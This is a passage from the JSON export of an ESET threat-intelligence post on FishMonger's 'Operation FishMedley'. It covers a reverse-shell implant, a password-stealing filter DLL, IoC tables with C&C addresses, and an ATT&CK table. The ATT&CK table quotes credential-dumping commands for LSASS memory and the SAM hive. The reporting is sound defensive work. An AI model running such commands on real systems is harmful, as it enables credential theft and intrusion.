width=\"438\"><span>MIGJAoGBAJ0EsHDp5vtk23KCxEq0tAocvMwn63vCqq0FVmXsY+fvD0tP6N<wbr><\/wbr>lc7k0lESpB4wGioj2xuhQgcEjXEkYAIPGiefYFovxMPVuzp1FsutZa5SD6<wbr><\/wbr>+4NcTRKsRsrMTZm5tFRuuENoEVmOSy3XoAS00mu4MM5tt7KKDlaczzhYJi<wbr><\/wbr>21PGk5AgMBAAE=<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/span><\/h4>\n<h4>RPipeCommander<\/h4>\n<p>At Victim D, we captured a previously unknown implant in the same process where Spyder was running. It was probably loaded from disk or downloaded by Spyder. Because its DLL export name was <span>rcmd64.dll<\/span>, we named this implant RPipeCommander.<\/p>\n<p>RPipeCommander is multithreaded and uses <span>IoCompletionPort<\/span> to manage the I\/O requests of the multiple threads. It creates the named pipe <span>\\.PipeCmdPipe&lt;PID&gt;<\/span>, where <span>&lt;PID&gt;<\/span> is the current process ID, and reads from and writes into this pipe.<\/p>\n<p>RPipeCommander is a reverse shell that accepts three commands via the named pipe:<\/p>\n<ul>\n<li><span>h<\/span> (<span>0x68<\/span>): create a <span>cmd.exe<\/span> process and bind pipes to the process to send commands and read the output.<\/li>\n<li><span>i<\/span> (<span>0x69<\/span>): Write a command in the existing <span>cmd.exe<\/span> process or read the output of the previous command.<\/li>\n<li><span>j<\/span> (<span>0x6A<\/span>): exit the <span>cmd.exe<\/span> process by writing <span>exitrn<\/span> in the command shell.<\/li>\n<\/ul>\n<p>Note that it seems we only have the server side of RPipeCommander. It is likely that a second component, a client, is used to send commands to the server from another machine on the local network.<\/p>\n<p>Finally, RPipeCommander is written in C++ and RTTI information was included in the captured samples, allowing us to obtain some of the class names:<\/p>\n<ul>\n<li><span>CPipeServer<\/span><\/li>\n<li><span>CPipeBuffer<\/span><\/li>\n<li><span>CPipeSrvEvent<\/span><\/li>\n<li><span>CPipeServerEventHandler<\/span><\/li>\n<\/ul>\n<h4>Other tools<\/h4>\n<p>In addition to the main implants described above, the attackers used a few additional tools to collect or exfiltrate data, which we describe in Table 7.<\/p>\n<p><em>Table 7. Other tools used during Operation FishMedley<\/em><\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"151\"><strong>Filename<\/strong><\/td>\n<td width=\"492\"><strong>Details<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"151\"><span>C:Windowssystem32<wbr><\/wbr>sasetup.dll<\/span><\/td>\n<td width=\"492\">Custom <a href=\"https:\/\/pentestlab.blog\/2020\/02\/10\/credential-access-password-filter-dll\/\">password filter<\/a>. The export <span>PasswordChangeNotify<\/span> is called when the user changes their password, and it writes the new password on disk in the current working directory in a log file named <span>etuper.log<\/span>. Note that it can also exfiltrate the password by sending a POST request to a hardcoded C&amp;C server, with <span>flag=&lt;password&gt;<\/span> in the POST data. However, this functionality is not enabled in this specific sample and there is no C&amp;C server in the configuration.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>C:Windowsdebug<wbr><\/wbr>svhost.tmp<\/span><\/td>\n<td width=\"492\">The fscan network scanner, available on <a href=\"https:\/\/github.com\/shadow1ng\/fscan\/\">GitHub<\/a>.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>C:nb.exe<\/span><\/td>\n<td width=\"492\"><a href=\"http:\/\/www.unixwiz.net\/tools\/nbtscan.html\">nbtscan<\/a> \u2013 a NetBIOS scanner.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>C:Userspublic<wbr><\/wbr>drop.zip<\/span><\/td>\n<td width=\"492\">It contains only <a href=\"https:\/\/github.com\/dropbox\/dbxcli\/\">dbxcli<\/a> \u2013 a tool written in Go to interact with Dropbox. It was likely used to exfiltrate data from the victim\u2019s network, but we haven\u2019t retrieved any information about the attackers\u2019 account.<br \/>Note that, despite the<span>.zip<\/span> extension, this is a CAB file. It was downloaded from <span>http:\/\/45.76.165[.]227\/wECqKe529r.png<\/span>.<br \/>Also note that dbxcli seems to have been compiled by the attackers, since the hash (SHA-1: <span>2AD82FFA393937A2353096FE2A2209E0EBC1C9D7<\/span>) has a very low prevalence in the wild.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Conclusion<\/h2>\n<p>In this blogpost, we have shown how FishMonger conducted a campaign against high-profile entities all around the world and was the subject of a US DOJ indictment in March 2025. We also showed that the group is not shy about reusing well-known implants, such as ShadowPad or SodaMaster, even long after they have been publicly described. Finally, we have independently confirmed that FishMonger is a team that is part of the Chinese company I\u2011SOON.<\/p>\n<blockquote>\n<div><em>For any inquiries about our research published on WeLiveSecurity, please contact us at <a href=\"mailto:threatintel@eset.com?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=autotagging&amp;utm_content=eset-research&amp;utm_term=en\">threatintel@eset.com<\/a>. <\/em><\/div>\n<div><em>ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the <a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=operation-fishmedley&amp;sfdccampaignid=7011n0000017htTAAQ\">ESET Threat Intelligence<\/a> page.<\/em><\/div>\n<\/blockquote>\n<h2>IoCs<\/h2>\n<p><em>A comprehensive list of indicators of compromise (IoCs) and samples can be found in <a href=\"https:\/\/github.com\/eset\/malware-ioc\/tree\/master\/fishmonger\">our GitHub repository<\/a>.<\/em><\/p>\n<h3>Files<\/h3>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"179\"><strong>SHA-1<\/strong><\/td>\n<td width=\"151\"><strong>Filename<\/strong><\/td>\n<td width=\"142\"><strong>Detection<\/strong><\/td>\n<td width=\"170\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span>D61A4387466A0C999981<wbr><\/wbr>086C2C994F2A80193CE3<\/span><\/td>\n<td width=\"151\">N\/A<\/td>\n<td width=\"142\">Win32\/Agent.ADVC<\/td>\n<td width=\"170\">ShadowPad dropper.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>918DDD842787D64B244D<wbr><\/wbr>353BFC0E14CC037D2D97<\/span><\/td>\n<td width=\"151\"><span>log.dll<\/span><\/td>\n<td width=\"142\">Win32\/Agent.ADVC<\/td>\n<td width=\"170\">ScatterBee-packed ShadowPad loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>F12C8CEC813257890F48<wbr><\/wbr>56353ABD9F739DEED890<\/span><\/td>\n<td width=\"151\"><span>task.exe<\/span><\/td>\n<td width=\"142\">Win64\/Agent.BEJ<\/td>\n<td width=\"170\">Spyder loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>3630F62771360540B667<wbr><\/wbr>01ABC8F6C868087A6918<\/span><\/td>\n<td width=\"151\"><span>DeElevator64<wbr><\/wbr>.dll<\/span><\/td>\n<td width=\"142\">Win64\/PSW.Agent.CU<\/td>\n<td width=\"170\">SodaMaster loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>3C08C694C222E7346BD8<wbr><\/wbr>633461C5D19EAE18B661<\/span><\/td>\n<td width=\"151\"><span>DrsSDK.dll<\/span><\/td>\n<td width=\"142\">Win64\/Agent.CAC<\/td>\n<td width=\"170\">SodaMaster loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>5401E3EF903AFE981CFC<wbr><\/wbr>2840D5F0EF2F1D83B0BF<\/span><\/td>\n<td width=\"151\"><span>safestore64<wbr><\/wbr>.dll<\/span><\/td>\n<td width=\"142\">Win64\/PSW.Agent.CU<\/td>\n<td width=\"170\">SodaMaster loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>A4F68D0F1C72C3AC9D70<wbr><\/wbr>919C17DC52692C43599E<\/span><\/td>\n<td width=\"151\"><span>libmaxminddb<wbr><\/wbr>-0.dll<\/span><\/td>\n<td width=\"142\">Win64\/PSW.Agent.CU<\/td>\n<td width=\"170\">SodaMaster loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>D8B631C551845F892EBB<wbr><\/wbr>5E7D09991F6C9D4FACAD<\/span><\/td>\n<td width=\"151\"><span>libvlc.dll<\/span><\/td>\n<td width=\"142\">Win64\/Agent.BFZ<\/td>\n<td width=\"170\">SodaMaster loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>3F5F6839C7DCB1D164E4<wbr><\/wbr>813AF2E30E9461AB35C1<\/span><\/td>\n<td width=\"151\"><span>sasetup.dll<\/span><\/td>\n<td width=\"142\">Win64\/PSW.Agent.CB<\/td>\n<td width=\"170\">Malicious password filter.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Network<\/h3>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"151\"><strong>IP<\/strong><\/td>\n<td width=\"113\"><strong>Domain<\/strong><\/td>\n<td width=\"142\"><strong>Hosting provider<\/strong><\/td>\n<td width=\"85\"><strong>First seen<\/strong><\/td>\n<td width=\"151\"><strong>Details<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"151\"><span>213.59.118[.]124<\/span><\/td>\n<td width=\"113\"><span>api.googleau<wbr><\/wbr>thenticatoro<wbr><\/wbr>nline[.]com<\/span><\/td>\n<td width=\"142\">STARK INDUSTRIES<\/td>\n<td width=\"85\">2022\u201103\u201120<\/td>\n<td width=\"151\">ShadowPad C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>61.238.103[.]165<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">IRT-HKBN-HK<\/td>\n<td width=\"85\">2022\u201103\u201110<\/td>\n<td width=\"151\">Spyder C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>162.33.178[.]23<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">BL Networks<\/td>\n<td width=\"85\">2022\u201103\u201128<\/td>\n<td width=\"151\">SodaMaster C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>78.141.202[.]70<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">The Constant Company<\/td>\n<td width=\"85\">2022\u201105\u201118<\/td>\n<td width=\"151\">SodaMaster C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>192.46.223[.]211<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">Akamai Connected Cloud<\/td>\n<td width=\"85\">2022\u201106\u201122<\/td>\n<td width=\"151\">SodaMaster C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>168.100.10[.]136<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">BL Networks<\/td>\n<td width=\"85\">2022\u201105\u201112<\/td>\n<td width=\"151\">SodaMaster C&amp;C server.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>MITRE ATT&amp;CK techniques<\/h2>\n<p><em>This table was built using <a href=\"https:\/\/attack.mitre.org\/resources\/versions\/\">version 16<\/a> of the MITRE ATT&amp;CK framework<strong>.<\/strong><\/em><\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"113\"><strong>Tactic<\/strong><\/td>\n<td width=\"113\"><strong>ID<\/strong><\/td>\n<td width=\"151\"><strong>Name<\/strong><\/td>\n<td width=\"265\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td rowspan=\"2\" width=\"113\"><strong>Resource Development<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1583\/004\">T1583.004<\/a><\/td>\n<td width=\"151\">Acquire Infrastructure: Server<\/td>\n<td width=\"265\">FishMonger rented servers at several hosting providers.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1583\/001\">T1583.001<\/a><\/td>\n<td width=\"151\">Acquire Infrastructure: Domains<\/td>\n<td width=\"265\">FishMonger bought domains and used them for C&amp;C traffic.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\" width=\"113\"><strong>Execution<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1059\/001\">T1059.001<\/a><\/td>\n<td width=\"151\">Command-Line Interface: PowerShell<\/td>\n<td width=\"265\">FishMonger downloaded ShadowPad using PowerShell.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1059\/003\">T1059.003<\/a><\/td>\n<td width=\"151\">Command-Line Interface: Windows Command Shell<\/td>\n<td width=\"265\">FishMonger deployed Spyder using a BAT script.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1072\">T1072<\/a><\/td>\n<td width=\"151\">Software Deployment Tools<\/td>\n<td width=\"265\">FishMonger gained access to a local admin console, abusing it to run commands on other machines in the victim\u2019s network.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Persistence<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1543\/003\">T1543.003<\/a><\/td>\n<td width=\"151\">Create or Modify System Process: Windows Service<\/td>\n<td width=\"265\">Some SodaMaster loaders persist via a Windows service.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\" width=\"113\"><strong>Defense Evasion<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1574\/002\">T1574.002<\/a><\/td>\n<td width=\"151\">Hijack Execution Flow: DLL Side-Loading<\/td>\n<td width=\"265\">ShadowPad is loaded by a DLL named <span>log.dll<\/span> that is side-loaded by a legitimate Bitdefender executable.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1140\">T1140<\/a><\/td>\n<td width=\"151\">Deobfuscate\/Decode Files or Information<\/td>\n<td width=\"265\">ShadowPad, Spyder, and SodaMaster are decrypted and loaded into memory.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"4\" width=\"113\"><strong>Credential Access<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1555\/003\">T1555.003<\/a><\/td>\n<td width=\"151\">Credentials from Password Stores: Credentials from Web Browsers<\/td>\n<td width=\"265\">Some SodaMaster loaders can extract passwords from the local Firefox database.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1556\/002\">T1556.002<\/a><\/td>\n<td width=\"151\">Modify Authentication Process: Password Filter DLL<\/td>\n<td width=\"265\">FishMonger used a custom password filter DLL that can write passwords to disk or exfiltrate them to a remote server.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1003\/001\">T1003.001<\/a><\/td>\n<td width=\"151\">OS Credential Dumping: LSASS Memory<\/td>\n<td width=\"265\">FishMonger dumped LSASS memory using <span>rundll32 C:windowssystem32comsvcs.dll, MiniDump<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1003\/002\">T1003.002<\/a><\/td>\n<td width=\"151\">OS Credential Dumping: Security Account Manager<\/td>\n<td width=\"265\">FishMonger dumped the security account manager using <span>reg save hklmsam C:userspublicmusicsam.hive<\/span>.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"4\" width=\"113\"><strong>Discovery<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1087\/001\">T1087.001<\/a><\/td>\n<td width=\"151\">Account Discovery: Local Account<\/td>\n<td width=\"265\">FishMonger executed <span>net user<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1016\">T1016<\/a><\/td>\n<td width=\"151\">System Network Configuration Discovery<\/td>\n<td width=\"265\">FishMonger executed <span>ipconfig \/all<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1007\">T1007<\/a><\/td>\n<td width=\"151\">System Service Discovery<\/td>\n<td width=\"265\">FishMonger executed <span>tasklist \/svc<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1057\">T1057<\/a><\/td>\n<td width=\"151\">Process Discovery<\/td>\n<td width=\"265\">FishMonger executed <span>tasklist \/v<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Lateral Movement<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1021\/002\">T1021.002<\/a><\/td>\n<td width=\"151\">Remote Services: SMB\/Windows Admin Shares<\/td>\n<td width=\"265\">FishMonger used Impacket to deploy malware on other machines in the local network.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Command and Control<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1095\">T1095<\/a><\/td>\n<td width=\"151\">Non-Application Layer Protocol<\/td>\n<td width=\"265\">ShadowPad communicates over raw TCP and UDP.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=operation-fishmedley&amp;sfdccampaignid=7011n0000017htTAAQ\"><img loading=\"lazy\" decoding=\"async\" alt=\"\" height=\"296\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-12\/welivesecurity-eset-threat-intelligence.jpeg\" width=\"915\"><\/a><\/p>\n<p class=\"wls-source\"><a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/operation-fishmedley\/\" rel=\"nofollow noopener\" target=\"_blank\">Read the full analysis on WeLiveSecurity \u2192<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>ESET researchers detail a global espionage operation by FishMonger, the APT group run by I\u2011SOON<\/p>\n","protected":false},"author":5,"featured_media":8734,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[2878],"tags":[],"class_list":["post-8731","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-eset-research"],"acf":[],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts\/8731","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/comments?post=8731"}],"version-history":[{"count":1,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts\/8731\/revisions"}],"predecessor-version":[{"id":9412,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts\/8731\/revisions\/9412"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/media\/8734"}],"wp:attachment":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/media?parent=8731"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/categories?post=8731"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/tags?post=8731"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}